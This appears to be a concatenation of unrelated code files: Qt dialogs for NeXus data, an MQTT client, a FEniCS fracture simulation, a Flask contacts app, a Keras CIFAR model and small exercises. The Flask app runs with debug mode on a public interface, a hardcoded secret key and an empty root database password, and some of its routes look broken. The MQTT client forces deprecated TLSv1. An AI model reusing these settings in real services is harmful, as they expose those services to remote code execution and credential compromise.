get_type(self):\n dtype = self.type_box.currentText()\n return dtype \n\n def get_shape(self):\n import ast\n try:\n shape = ast.literal_eval(self.shape_box.text())\n try:\n it = iter(shape)\n return shape\n except TypeError:\n if isinstance(shape, numbers.Integral):\n return (shape,)\n else:\n raise NeXusError('Invalid shape')\n except ValueError:\n raise NeXusError('Invalid shape')\n\n def accept(self):\n name = self.get_name()\n if name:\n dtype = self.get_type()\n if dtype is None:\n dtype = np.float64\n shape = self.get_shape()\n self.node[name] = NXfield(dtype=dtype, shape=shape)\n logging.info(\"'%s' initialized in '%s'\" \n % (self.node[name], self.node.nxpath)) \n super(InitializeDialog, self).accept()\n\n \nclass RenameDialog(BaseDialog):\n \"\"\"Dialog to rename a NeXus node\"\"\"\n\n def __init__(self, node, parent=None):\n\n super(RenameDialog, self).__init__(parent)\n\n self.node = node\n\n self.setWindowTitle(\"Rename NeXus data\")\n\n self.layout = QtGui.QVBoxLayout()\n self.layout.addLayout(self.define_grid())\n self.layout.addWidget(self.close_buttons()) \n self.setLayout(self.layout)\n\n def define_grid(self):\n grid = QtGui.QGridLayout()\n grid.setSpacing(10)\n name_label = QtGui.QLabel()\n name_label.setAlignment(QtCore.Qt.AlignLeft)\n name_label.setText(\"New Name:\")\n self.name_box = QtGui.QLineEdit(self.node.nxname)\n self.name_box.setAlignment(QtCore.Qt.AlignLeft)\n grid.addWidget(name_label, 0, 0)\n grid.addWidget(self.name_box, 0, 1)\n self.combo_box = None\n if isinstance(self.node, NXgroup) and self.node.nxclass != 'NXroot':\n combo_label = QtGui.QLabel()\n combo_label.setAlignment(QtCore.Qt.AlignLeft)\n combo_label.setText(\"New Class:\")\n self.combo_box = QtGui.QComboBox()\n from .consoleapp import _mainwindow\n parent_class = self.node.nxgroup.nxclass\n standard_groups = sorted(list(set([g for g in \n _mainwindow.nxclasses[parent_class][2]])))\n for name in standard_groups:\n self.combo_box.addItem(name)\n self.combo_box.setItemData(self.combo_box.count()-1, \n wrap(_mainwindow.nxclasses[name][0], 40),\n QtCore.Qt.ToolTipRole)\n self.combo_box.insertSeparator(self.combo_box.count())\n other_groups = sorted([g for g in _mainwindow.nxclasses \n if g not in standard_groups])\n for name in other_groups:\n self.combo_box.addItem(name)\n self.combo_box.setItemData(self.combo_box.count()-1, \n wrap(_mainwindow.nxclasses[name][0], 40),\n QtCore.Qt.ToolTipRole)\n self.combo_box.insertSeparator(self.combo_box.count())\n self.combo_box.addItem('NXgroup')\n self.combo_box.setCurrentIndex(self.combo_box.findText(self.node.nxclass))\n self.combo_box.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n grid.addWidget(combo_label, 1, 0)\n grid.addWidget(self.combo_box, 1, 1)\n else:\n parent_class = self.node.nxgroup.nxclass\n if parent_class != 'NXroot' and parent_class != 'NXtree':\n combo_label = QtGui.QLabel()\n combo_label.setAlignment(QtCore.Qt.AlignLeft)\n combo_label.setText(\"Valid Fields:\")\n self.combo_box = QtGui.QComboBox()\n self.combo_box.currentIndexChanged.connect(self.set_name)\n from .consoleapp import _mainwindow\n fields = sorted(list(set([g for g in \n _mainwindow.nxclasses[parent_class][1]])))\n for name in fields:\n self.combo_box.addItem(name)\n self.combo_box.setItemData(self.combo_box.count()-1, \n wrap(_mainwindow.nxclasses[parent_class][1][name][2], 40),\n QtCore.Qt.ToolTipRole)\n if self.node.nxname in fields:\n self.combo_box.setCurrentIndex(self.combo_box.findText(self.node.nxname))\n else:\n self.name_box.setText(self.node.nxname)\n self.combo_box.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n grid.addWidget(self.combo_box, 0, 2)\n grid.setColumnMinimumWidth(1, 200)\n return grid\n\n def get_name(self):\n return self.name_box.text()\n\n def set_name(self):\n self.name_box.setText(self.combo_box.currentText())\n\n def get_class(self):\n return self.combo_box.currentText()\n\n def accept(self):\n name = self.get_name()\n if name:\n self.node.rename(name)\n if isinstance(self.node, NXgroup):\n if self.combo_box is not None:\n self.node.nxclass = self.get_class()\n super(RenameDialog, self).accept()\n\n \nclass RemoveDialog(BaseDialog):\n \"\"\"Dialog to remove a NeXus node from the tree\"\"\"\n \n def __init__(self, node, parent=None):\n\n super(RemoveDialog, self).__init__(parent)\n \n self.node = node\n \n layout = QtGui.QVBoxLayout()\n layout.addWidget(QtGui.QLabel('Are you sure you want to remove \"%s\"?' \n % node.nxname))\n layout.addWidget(self.close_buttons()) \n self.setLayout(layout)\n\n self.setWindowTitle(\"Remove NeXus File\")\n\n def accept(self):\n del self.node.nxgroup[self.node.nxname]\n super(RemoveDialog, self).accept()\n\n \nclass DeleteDialog(BaseDialog):\n \"\"\"Dialog to delete a NeXus node\"\"\"\n \n def __init__(self, node, parent=None):\n\n super(DeleteDialog, self).__init__(parent)\n \n self.node = node\n \n layout = QtGui.QVBoxLayout()\n layout.addWidget(QtGui.QLabel('Are you sure you want to delete \"%s\"?' \n % node.nxname))\n layout.addWidget(self.close_buttons()) \n self.setLayout(layout)\n\n self.setWindowTitle(\"Delete NeXus Data\")\n\n def accept(self):\n del self.node.nxgroup[self.node.nxname]\n super(DeleteDialog, self).accept()\n\n \nclass SignalDialog(BaseDialog):\n \"\"\"Dialog to set the signal of NXdata\"\"\"\n \n def __init__(self, node, parent=None):\n\n super(SignalDialog, self).__init__(parent)\n \n if isinstance(node, NXfield):\n self.group = node.nxgroup\n signal_name = node.nxname\n else:\n self.group = node\n if self.group.nxsignal is not None:\n signal_name = self.group.nxsignal.nxname\n else:\n signal_name = None\n\n self.signal_combo = QtGui.QComboBox() \n for node in self.group.values():\n if isinstance(node, NXfield) and node.shape != ():\n self.signal_combo.addItem(node.nxname)\n if self.signal_combo.count() == 0:\n raise NeXusError(\"No plottable field in group\")\n self.signal_combo.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n if signal_name:\n idx = self.signal_combo.findText(signal_name)\n if idx >= 0:\n self.signal_combo.setCurrentIndex(idx)\n else:\n self.signal_combo.setCurrentIndex(0)\n else:\n self.signal_combo.setCurrentIndex(0)\n self.signal_combo.currentIndexChanged.connect(self.choose_signal)\n\n self.grid = QtGui.QGridLayout()\n self.grid.setSpacing(10)\n self.grid.addWidget(QtGui.QLabel('Signal :'), 0, 0)\n self.grid.addWidget(self.signal_combo, 0, 1)\n self.choose_signal()\n\n self.layout = QtGui.QVBoxLayout()\n self.layout.addLayout(self.grid)\n self.layout.addWidget(self.close_buttons())\n self.setLayout(self.layout)\n\n self.setWindowTitle(\"Set signal for %s\" % self.group.nxname)\n\n @property\n def signal(self):\n return self.group[self.signal_combo.currentText()]\n\n @property\n def ndim(self):\n return len(self.signal.shape)\n\n def choose_signal(self):\n row = 1\n self.axis_boxes = {}\n for axis in range(self.ndim):\n self.axis_boxes[axis] = self.axis_box(axis)\n if self.axis_boxes[axis] is not None:\n row += 1\n self.grid.addWidget(QtGui.QLabel(\"Axis %s: \" % axis), row, 0)\n self.grid.addWidget(self.axis_boxes[axis], row, 1)\n while row < self.grid.rowCount() - 1:\n self.remove_axis(row)\n row += 1 \n\n def axis_box(self, axis=0):\n box = QtGui.QComboBox()\n for node in self.group.values():\n if node is not self.signal and self.check_axis(node, axis):\n box.addItem(node.nxname)\n if box.count() == 0:\n return None\n if 'axes' in self.signal.attrs:\n from nexusformat.nexus.tree import _readaxes\n default_axis = _readaxes(self.signal.axes)[axis]\n else:\n axes = self.group.nxaxes\n if axes is not None:\n default_axis = self.group.nxaxes[axis].nxname\n else:\n default_axis = None\n if default_axis:\n try:\n box.setCurrentIndex(box.findText(default_axis))\n except Exception:\n pass\n else:\n box.setCurrentIndex(0)\n return box\n\n def remove_axis(self, axis):\n row = axis + 1\n for column in range(2):\n item = self.grid.itemAtPosition(row, column)\n if item is not None:\n widget = item.widget()\n if widget is not None:\n widget.setVisible(False)\n self.grid.removeWidget(widget)\n widget.deleteLater() \n\n def check_axis(self, node, axis):\n if len(node.shape) > 1:\n return False\n try:\n node_len, axis_len = self.signal.shape[axis], node.shape[0]\n if axis_len == node_len or axis_len == node_len+1:\n return True\n except Exception:\n pass\n return False\n\n def get_axis(self, axis):\n try:\n return self.group[self.axis_boxes[axis].currentText()]\n except Exception:\n return None\n\n def get_axes(self):\n return [self.get_axis(axis) for axis in range(self.ndim)]\n\n def accept(self):\n try:\n axes = self.get_axes()\n if None in axes:\n raise NeXusError(\"Unable to set axes\")\n if len(set([axis.nxname for axis in axes])) < len(axes):\n raise NeXusError(\"Cannot have duplicate axes\")\n self.group.nxsignal = self.signal\n self.group.nxaxes = axes\n super(SignalDialog, self).accept()\n except NeXusError as error:\n from .mainwindow import report_error \n report_error(\"Setting signal\", error)\n\n \nclass LogDialog(BaseDialog):\n \"\"\"Dialog to display a NeXpy log filt\"\"\"\n \n def __init__(self, parent=None):\n\n super(LogDialog, self).__init__(parent)\n \n from .consoleapp import _nexpy_dir\n self.log_directory = _nexpy_dir\n\n self.ansi_re = re.compile('\\x1b' + r'\\[([\\dA-Fa-f;]*?)m')\n \n layout = QtGui.QVBoxLayout()\n self.text_box = QtGui.QPlainTextEdit()\n self.text_box.setMinimumWidth(700)\n self.text_box.setMinimumHeight(600)\n layout.addWidget(self.text_box)\n footer_layout = QtGui.QHBoxLayout()\n self.file_combo = QtGui.QComboBox()\n for file_name in self.get_filesindirectory('nexpy', extension='.log*',\n directory=self.log_directory):\n self.file_combo.addItem(file_name)\n self.file_combo.setCurrentIndex(self.file_combo.findText('nexpy.log'))\n self.file_combo.currentIndexChanged.connect(self.show_log)\n close_box = QtGui.QDialogButtonBox(QtGui.QDialogButtonBox.Close)\n close_box.rejected.connect(self.reject)\n footer_layout.addStretch()\n footer_layout.addWidget(self.file_combo)\n footer_layout.addWidget(close_box)\n layout.addLayout(footer_layout)\n self.setLayout(layout)\n\n self.show_log()\n\n @property\n def file_name(self):\n return os.path.join(self.log_directory, self.file_combo.currentText())\n\n def show_log(self):\n f = open(self.file_name, 'r')\n try:\n from ansi2html import Ansi2HTMLConverter\n conv = Ansi2HTMLConverter(dark_bg=False, inline=True)\n text = conv.convert(''.join(f.readlines()))\n self.text_box.appendHtml(text)\n except ImportError:\n self.text_box.setPlainText(self.ansi_re.sub('', f.read()))\n f.close()\n self.text_box.verticalScrollBar().setValue(\n self.text_box.verticalScrollBar().maximum())\n self.setWindowTitle(\"Log File: %s\" % self.file_name)\n\n\n","sub_path":"src/nexpy/gui/datadialogs.py","file_name":"datadialogs.py","file_ext":"py","file_size_in_byte":51732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"162249726","text":"import paho.mqtt.client as mqtt\nimport json\nimport time\nimport ssl\nbroker_host = \"broker.qubitro.com\"\nbroker_port = 8883\ndevice_id = \"PASTE_DEVICE_ID\"\ndevice_token = \"PASTE_DEVICE_TOKEN\"\n\ndef on_connect(client, userdata, flags, rc):\n if rc == 0:\n print(\"Connected to Qubitro!\")\n client.on_disconnect = on_disconnect\n else:\n print(\"Failed to connect, visit: https://docs.qubitro.com/client-guides/connect-device/mqtt\\n return code:\", rc)\n\ndef on_disconnect(client, userdata, rc):\n # E.g. reconnect to the broker\n print(\"Disconnection returned result:\" + str(rc))\n\nclient = mqtt.Client(client_id=device_id)\ncontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)\nclient.tls_set_context(context)\nclient.username_pw_set(username=device_id, password=device_token)\nclient.connect(broker_host, broker_port, 60)\nclient.on_connect = on_connect\nclient.loop_start()\n\nwhile True:\n if client.is_connected:\n time.sleep(1)","sub_path":"docs/protocol/mqtt/python/qubitro_mqtt_disconnect.py","file_name":"qubitro_mqtt_disconnect.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"513634090","text":"import matplotlib.pyplot as plt\n\nfrom fenics import *\nfrom tools.elasticity import *\n\n#----------------------------------------------------------------------#\n# Set some Fenics parameters\nparameters[\"form_compiler\"][\"optimize\"] = True\nparameters[\"form_compiler\"][\"cpp_optimize\"] = True\nparameters[\"form_compiler\"][\"representation\"] = \"uflacs\"\nparameters[\"linear_algebra_backend\"] = \"PETSc\"\nset_log_level(LogLevel.PROGRESS)\ninfo(parameters, False)\n#----------------------------------------------------------------------#\n\n\n#----------------------------------------------------------------------#\n# Load mesh and define functional spaces\nmesh = Mesh(\"meshes/mesh_fenics.xml\")\nmesh = refine(mesh)\ndim = mesh.topology().dim()\nV = FunctionSpace(mesh, 'Lagrange', 1)\nW = VectorFunctionSpace(mesh, 'Lagrange', 1, dim)\n#----------------------------------------------------------------------#\n\n\n#----------------------------------------------------------------------#\n# Define boundary conditions\nud = Expression(\"t\", t=0.0, degree=1)\n\ndef bottom(x, on_boundary):\n tol = 1E-8\n return on_boundary and abs(x[1]) < tol\n\ndef top(x, on_boundary):\n tol = 1E-8\n return on_boundary and abs(x[1]-1.0) < tol\n\ndef right(x, on_boundary):\n tol = 1E-8\n return on_boundary and abs(x[0]-1.0) < tol\n\ndef left(x, on_boundary):\n tol = 1E-8\n return on_boundary and abs(x[0]) < tol\n\n\nbottomBCs = DirichletBC(W, Constant((0.0, 0.0)), bottom)\ntopBC_y = DirichletBC(W.sub(1), ud, top)\ntopBC_x = DirichletBC(W.sub(0), Constant(0.0), top)\nbcs = [bottomBCs, topBC_x, topBC_y]\n#----------------------------------------------------------------------#\n\n\n#----------------------------------------------------------------------#\n# Define weak forms\nlmbda, mu = 121.15e3, 80.77e3\ngc, lc = 2.7, 0.0075\n\ndef Max(a, b): return (a+b+abs(a-b))/Constant(2)\n\nd, s = TrialFunction(V), TestFunction(V)\ndu, v = TrialFunction(W), TestFunction(W)\n\nuold, unew, u_ = Function(W), Function(W), Function(W)\ndnew = Function(V)\n\nhistold = energy_density_positive(uold, lmbda, mu)\nhistnew = energy_density_positive(unew, lmbda, mu)\nhist = Max(histold, histnew)\n\nId = ((2.0*hist + gc/lc)*dot(d,s) + gc*lc*inner(nabla_grad(d), nabla_grad(s)) - 2.0*hist*s)*dx\nFu = inner(sigma_spectral_split(u_, dnew, lmbda, mu), epsilon(v))*dx\nJu = derivative(Fu, u_, du)\n\nAd, Ld = lhs(Id), rhs(Id)\n#----------------------------------------------------------------------#\n\n\n#----------------------------------------------------------------------#\n# Define variational problems\nd = Function(V)\nprob_dmge = LinearVariationalProblem(Ad, Ld, d)\nprob_disp = NonlinearVariationalProblem(Fu, u_, bcs, Ju)\n\nsolver_dmge = LinearVariationalSolver(prob_dmge)\nsolver_disp = NonlinearVariationalSolver(prob_disp)\n\nprm = solver_disp.parameters\nprm[\"newton_solver\"][\"absolute_tolerance\"] = 1E-8\nprm[\"newton_solver\"][\"relative_tolerance\"] = 1E-7\nprm[\"newton_solver\"][\"maximum_iterations\"] = 5\nprm[\"newton_solver\"][\"relaxation_parameter\"] = 1.0\n\"\"\"\nprm[\"linear_solver\"] = \"gmres\"\nprm[\"preconditioner\"] = \"ilu\"\nprm[\"krylov_solver\"][\"absolute_tolerance\"] = 1E-9\nprm[\"krylov_solver\"][\"relative_tolerance\"] = 1E-7\nprm[\"krylov_solver\"][\"maximum_iterations\"] = 1000\nprm[\"krylov_solver\"][\"gmres\"][\"restart\"] = 40\nprm[\"krylov_solver\"][\"preconditioner\"][\"ilu\"][\"fill_level\"] = 0\n\"\"\"\n#----------------------------------------------------------------------#\n\n\n#----------------------------------------------------------------------#\n# Staggered algorithm\nnsteps = 250\ndelta = 1E-5\n\nd.vector().zero()\ndnew.assign(d)\n\nud.t += delta\n\nuold.vector().zero()\nsolver_disp.solve()\nunew.assign(u_)\n\n\nfor n in range(nsteps):\n ud.t += delta\n\n solver_dmge.solve()\n dnew.assign(d)\n\n uold.assign(u_)\n solver_disp.solve()\n unew.assign(u_)\n\n plot(d, cmap='jet')\n plt.draw()\n plt.pause(0.0001)\n#----------------------------------------------------------------------#\n","sub_path":"nonLinearSpectralSplit.py","file_name":"nonLinearSpectralSplit.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"455525669","text":"from typing import List\n\n\nclass Solution:\n def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:\n \"\"\"\n Do not return anything, modify nums1 in-place instead.\n \"\"\"\n \"\"\"\n https://leetcode.com/problems/merge-sorted-array/\n // Time Complexity : O(m+n)\n 'm' is the number of elements in the first array.\n 'n' is the number of elements in the second array\n // Space Complexity : O(1)\n // Did this code successfully run on Leetcode : Yes\n // Three line explanation of solution in plain english :\n - Two pointers each pointing to the last element in the sorted list\n - Traverse both the lists and copy the larger element\n - If any remaning elements from the second list, copy to the first list.\n \"\"\"\n\n # edge case\n if not nums1 or not nums2 or n == 0:\n return\n\n k, ptr1, ptr2 = m + n - 1, m - 1, n - 1\n while ptr1 >= 0 and ptr2 >= 0:\n # case 1\n # element at ptr1 is greater or equal\n if nums1[ptr1] >= nums2[ptr2]:\n nums1[k] = nums1[ptr1]\n ptr1 -= 1\n # case 2\n # element at ptr2 is greater\n else:\n nums1[k] = nums2[ptr2]\n ptr2 -= 1\n k -= 1\n\n # copy the remaining elements from nums2\n while ptr2 >= 0:\n nums1[k] = nums2[ptr2]\n ptr2 -= 1\n k -= 1\n\n\nif __name__ == '__main__':\n h = Solution()\n nums1 = [1, 2, 3, 0, 0, 0]\n nums2 = [2, 5, 6]\n h.merge(nums1, 3, nums2, 3)\n print(nums1)\n","sub_path":"88_merge_sorted_array.py","file_name":"88_merge_sorted_array.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"275272174","text":"from flask import Flask\nfrom flask import request ,flash\nfrom flask import render_template , redirect , url_for\nimport json\nimport requests\nfrom server import Connection , Action\n\n\napp = Flask(__name__)\napp.debug = True\napp.secret_key = 'secretKey'\napp.config[\"CACHE_TYPE\"] = \"null\"\n\nclass Contacts:\n name = None\n address = None\n email = None\n mobile = None \n\nconnection , res = Connection.open(host = 'localhost' , user = 'root', pwd = '', db = 'db_test' , port =3306)\n\n\n@app.route('/', methods=['GET'])\ndef home():\n if connection:\n return render_template('index.html' ,result = connection )\n else:\n return render_template('index.html' , result = None)\n\n@app.route('/details/contacts' , methods= ['GET'])\ndef details():\n entries = Action(connection).Show_Details()\n return render_template('details.html' , entries = entries )\n\n@app.route('/update/contact/' , methods= ['GET'])\ndef update(id):\n response = Action(connection).Get_Details(id)\n return render_template('update.html' , id = id , name = response.get('name') , email = response.get('email') , address = response.get('address') ,\n mobile = response.get('mobile') )\n\n\n@app.route('/contact/submit', methods=['POST'])\ndef submit_contact():\n Contacts.name = request.form['name']\n Contacts.email = request.form['email']\n Contacts.address = request.form['address']\n Contacts.mobile = request.form['mobile']\n if Contacts.name:\n response = Action(connection).Add(Contacts)\n if response:\n return redirect(url_for('home' ))\n else:\n return redirect(url_for('home' ))\n else:\n return redirect(url_for('home' ))\n\n\n@app.route('/update/contact//individual' , methods= ['PUT' , 'POST' , 'GET'])\ndef update_contact_individual(id):\n Contacts.name = request.form['name']\n Contacts.email = request.form['email']\n Contacts.address = request.form['address']\n Contacts.mobile = request.form['mobile']\n if Contacts.name:\n response = Action(connection).Update(id = id , obj = Contacts)\n if response.result == 'Success':\n return redirect(url_for('details'))\n else:\n return redirect(url_for('update' ,id = id))\n else:\n return redirect(url_for('update' ,id = id))\n\n@app.route('/delete/contact//individual' , methods= ['DELETE' ,'POST' ,'GET'])\ndef delete_individual_contact(id):\n response = Action(connection).Delete(id)\n if response.result == 'Success':\n return redirect(url_for('details'))\n else:\n return redirect(url_for('details'))\n \nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n\n \n \n","sub_path":"Task/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"319175485","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport numpy as np\nimport ipromps_lib\nfrom sklearn.externals import joblib\nimport os\nimport ConfigParser\nimport matplotlib.pyplot as plt\nimport ipdb\n\n# the current file path\nfile_path = os.path.dirname(__file__)\n\n# read models cfg file\ncp_models = ConfigParser.SafeConfigParser()\ncp_models.read(os.path.join(file_path, '../cfg/models.cfg'))\n# read models params\ndatasets_path = os.path.join(file_path, cp_models.get('datasets', 'path'))\nlen_norm = cp_models.getint('datasets', 'len_norm')\nnum_basis = cp_models.getint('basisFunc', 'num_basisFunc')\nsigma_basis = cp_models.getfloat('basisFunc', 'sigma_basisFunc')\ndatasets_norm_preproc = joblib.load(os.path.join(datasets_path, 'pkl/datasets_norm_preproc.pkl'))\n\nnum_demo = 5\ntest_idx = 0\n\nplt.figure(figsize=(10,5),dpi=80, facecolor='w', edgecolor='b')\n\npromp = ipromps_lib.ProMP()\nfor idx_demo in range(num_demo):\n promp.add_demonstration(datasets_norm_preproc[0][idx_demo]['left_joints'][:,0])\n\npromp.add_viapoint(0.1, datasets_norm_preproc[0][test_idx]['left_joints'][10,0])\n# promp.add_viapoint(0.2, datasets_norm_preproc[0][test_idx]['left_joints'][20,0])\n# promp.add_viapoint(0.3, datasets_norm_preproc[0][test_idx]['left_joints'][30,0])\n# promp.add_viapoint(0.4, datasets_norm_preproc[0][test_idx]['left_joints'][40,0])\n# promp.add_viapoint(0.5, datasets_norm_preproc[0][test_idx]['left_joints'][50,0])\n# promp.add_viapoint(1.0, datasets_norm_preproc[0][test_idx]['left_joints'][100,0])\npromp.param_updata()\n\n\npromp.plot_uViapoints()\npromp.plot_prior(b_regression=False, linewidth_mean=5, b_dataset=False)\npromp.plot_uUpdated(legend='Inferred trajectory')\nplt.plot(promp.x, datasets_norm_preproc[0][test_idx]['left_joints'][:,0], color='g', linewidth=5, label='ground truth')\n\nfor demo_idx in range(num_demo):\n data = datasets_norm_preproc[0][demo_idx]['left_joints'][:,0]\n plt.plot(np.array(range(len(data)))/100.0, data, color='grey', linewidth=2)\n\nplt.rc('legend', fontsize=20, handlelength=5)\n\nax = plt.gca()\nax.spines['top'].set_visible(False) #去掉上边框\nax.spines['right'].set_visible(False) #去掉右边框\nplt.yticks(fontsize=20)\nplt.xticks(fontsize=20)\nplt.title(\"example\",fontsize=20) \nplt.xlabel('t(s)',fontsize=20)\nplt.ylabel('y(m)',fontsize=20)\nplt.legend(loc=2)\n\nplt.show()\n\n","sub_path":"visulization/v_promp.py","file_name":"v_promp.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"361830996","text":"from __future__ import print_function\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.models import Model\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Convolution2D, MaxPooling2D, merge, Input, Lambda\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.optimizers import Adam\nfrom utils.preprocess import get_cifar\n\nbatch_size = 32\nnb_classes = 10\nnb_epoch = 200\ndata_augmentation = True\n\n# show the summary?\nshow_summary = True\n\n# save the weights after training?\nsave_weights = True\nweights_file = 'cifar10_4l.h5'\n\n# the data, shuffled and split between train and test sets\n(X_train, Y_train), (X_test, Y_test) = get_cifar(p=1.0, append_test=False, use_c10=True)\n\nprint('X_train shape:', X_train.shape)\nprint(X_train.shape[0], 'train samples')\nprint(X_test.shape[0], 'test samples')\n\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\n\n#cross-connections between two conv layers, Y is the middle layer, while U and V are side layers.\n\ninputYUV = Input(shape=(3, 32, 32))\ninputNorm = BatchNormalization(axis=1)(inputYUV)\n\n# To simplify the data augmentation, I delay slicing until this point.\n# Not sure if there is a better way to handle it. ---Petar\ninputY = Lambda(lambda x: x[:,0:1,:,:], output_shape=(1, 32, 32))(inputNorm)\ninputU = Lambda(lambda x: x[:,1:2,:,:], output_shape=(1, 32, 32))(inputNorm)\ninputV = Lambda(lambda x: x[:,2:3,:,:], output_shape=(1, 32, 32))(inputNorm)\n\nconvY = Convolution2D(32, 3, 3, border_mode='same', activation='relu')(inputY)\nconvU = Convolution2D(16, 3, 3, border_mode='same', activation='relu')(inputU)\nconvV = Convolution2D(16, 3, 3, border_mode='same', activation='relu')(inputV)\n\nconvY = Convolution2D(32, 3, 3, border_mode='same', activation='relu')(convY)\nconvU = Convolution2D(16, 3, 3, border_mode='same', activation='relu')(convU)\nconvV = Convolution2D(16, 3, 3, border_mode='same', activation='relu')(convV)\n\npoolY = MaxPooling2D((2,2), strides=(2, 2), border_mode='same')(convY)\npoolU = MaxPooling2D((2,2), strides=(2, 2), border_mode='same')(convU)\npoolV = MaxPooling2D((2,2), strides=(2, 2), border_mode='same')(convV)\n\npoolY = Dropout(0.25)(poolY)\npoolU = Dropout(0.25)(poolU)\npoolV = Dropout(0.25)(poolV)\n\nU_to_Y = Convolution2D(16, 1, 1, border_mode='same', activation='relu')(poolU)\nV_to_Y = Convolution2D(16, 1, 1, border_mode='same', activation='relu')(poolV)\nY_to_UV = Convolution2D(32, 1, 1, border_mode='same', activation='relu')(poolY)\n\nYmap = merge([poolY,U_to_Y,V_to_Y], mode='concat', concat_axis=1)\nUmap = merge([poolU,Y_to_UV], mode='concat', concat_axis=1)\nVmap = merge([poolV,Y_to_UV], mode='concat', concat_axis=1)\n\n\n\nconvY = Convolution2D(64, 3, 3, border_mode='same', activation='relu')(Ymap)\nconvU = Convolution2D(32, 3, 3, border_mode='same', activation='relu')(Umap)\nconvV = Convolution2D(32, 3, 3, border_mode='same', activation='relu')(Vmap)\n\n\nconvY = Convolution2D(64, 3, 3, border_mode='same', activation='relu')(convY)\nconvU = Convolution2D(32, 3, 3, border_mode='same', activation='relu')(convU)\nconvV = Convolution2D(32, 3, 3, border_mode='same', activation='relu')(convV)\n\npoolY = MaxPooling2D((2,2), strides=(2, 2), border_mode='same')(convY)\npoolU = MaxPooling2D((2,2), strides=(2, 2), border_mode='same')(convU)\npoolV = MaxPooling2D((2,2), strides=(2, 2), border_mode='same')(convV)\n\npoolY = Dropout(0.25)(poolY)\npoolU = Dropout(0.25)(poolU)\npoolV = Dropout(0.25)(poolV)\n\n\nconcatenate_map=merge([poolY,poolU,poolV], mode='concat', concat_axis=1)\n\nreshape=Flatten()(concatenate_map)\nfc=Dense(512, activation='relu')(reshape)\nfc=Dropout(0.5)(fc)\nout=Dense(nb_classes, activation='softmax')(fc)\n\nmodel = Model(input=inputYUV, output=out)\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\nif show_summary:\n print(model.summary())\n\nif not data_augmentation:\n print('Not using data augmentation.')\n model.fit(X_train, Y_train,\n batch_size=batch_size,\n nb_epoch=nb_epoch,\n validation_data=(X_test, Y_test),\n shuffle=True,\n verbose=2)\nelse:\n print('Using real-time data augmentation.')\n\n # this will do preprocessing and realtime data augmentation\n datagen = ImageDataGenerator(\n featurewise_center=False, # set input mean to 0 over the dataset\n samplewise_center=False, # set each sample mean to 0\n featurewise_std_normalization=False, # divide inputs by std of the dataset\n samplewise_std_normalization=False, # divide each input by its std\n zca_whitening=False, # apply ZCA whitening\n rotation_range=0, # randomly rotate images in the range (degrees, 0 to 180)\n width_shift_range=0.1, # randomly shift images horizontally (fraction of total width)\n height_shift_range=0.1, # randomly shift images vertically (fraction of total height)\n horizontal_flip=True, # randomly flip images\n vertical_flip=False) # randomly flip images\n\n # compute quantities required for featurewise normalization\n # (std, mean, and principal components if ZCA whitening is applied)\n datagen.fit(X_train)\n\n # fit the model on the batches generated by datagen.flow()\n model.fit_generator(datagen.flow(X_train, Y_train,\n batch_size=batch_size),\n samples_per_epoch=X_train.shape[0],\n nb_epoch=nb_epoch,\n validation_data=(X_test, Y_test),\n verbose=2)\n\nif save_weights:\n model.save_weights(weights_file)\n","sub_path":"models/cifar10_4l.py","file_name":"cifar10_4l.py","file_ext":"py","file_size_in_byte":5650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"527774304","text":"# coding: utf-8\n\ndef main():\n\tISBN = getISBN()\n\tif len(ISBN) == 10:\n\n\t\tsum = getNum(ISBN)\n\n\t\tif verify(sum) == True:\n\t\t\tprint (\"The number is valid\")\n\t\telse:\n\t\t\tprint (\"The number is not valid\") \n\telse:\n\t\tprint (\"The number is not valid\")\ndef getISBN():\n\tISBN = input(\"Enter an ISBN : \")\n\tISBN = ISBN.replace('-','')\n\tISBN = ISBN.replace('X','10')\n\tISBN = ISBN.replace('x','10')\n\treturn ISBN\ndef getNum(ISBN):\n\tsum = 0\n\t\n\tfor i in range(10):\n\t\tsum = sum +int(ISBN[i])*(10-i)\n\treturn sum\ndef verify(sum):\n\tif sum % 11 == 0:\n\t\treturn True\n\telse:\n\t\treturn False\n\n\nmain()\n\n \n#0-13-030657-6\n\n\n\t\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"python-learning/2017.3.5/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"4242491","text":"import tornado.web\nfrom json_handler import BaseHandler\n\nclass MenuTemplateHandler(tornado.web.RequestHandler):\n\tdef get(self, url):\n\n\t\tif (url == 'menulevel1'):\n\t\t\tself.render(\"menu/menulevel1.html\")\n\t\telse:\n\t\t\tself.render(\"menu/menulevel2.html\")\n \nclass AboutPageHandler(BaseHandler):\n def get(self, url):\n if (url == 'about'):\n self.render(\"about.html\", name=self.get_current_user() if self.get_current_user() != 'public' else None)\n elif (url == 'login'):\n 